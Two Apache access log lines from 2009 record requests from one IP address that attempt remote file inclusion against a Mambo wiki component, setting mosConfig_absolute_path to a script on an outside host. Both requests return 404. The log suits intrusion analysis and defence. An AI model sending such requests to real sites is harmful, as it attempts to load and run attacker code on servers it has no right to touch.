200.101.70.1 - - [12/Jul/2009:04:13:29 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.101.70.1 - - [12/Jul/2009:04:13:29 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
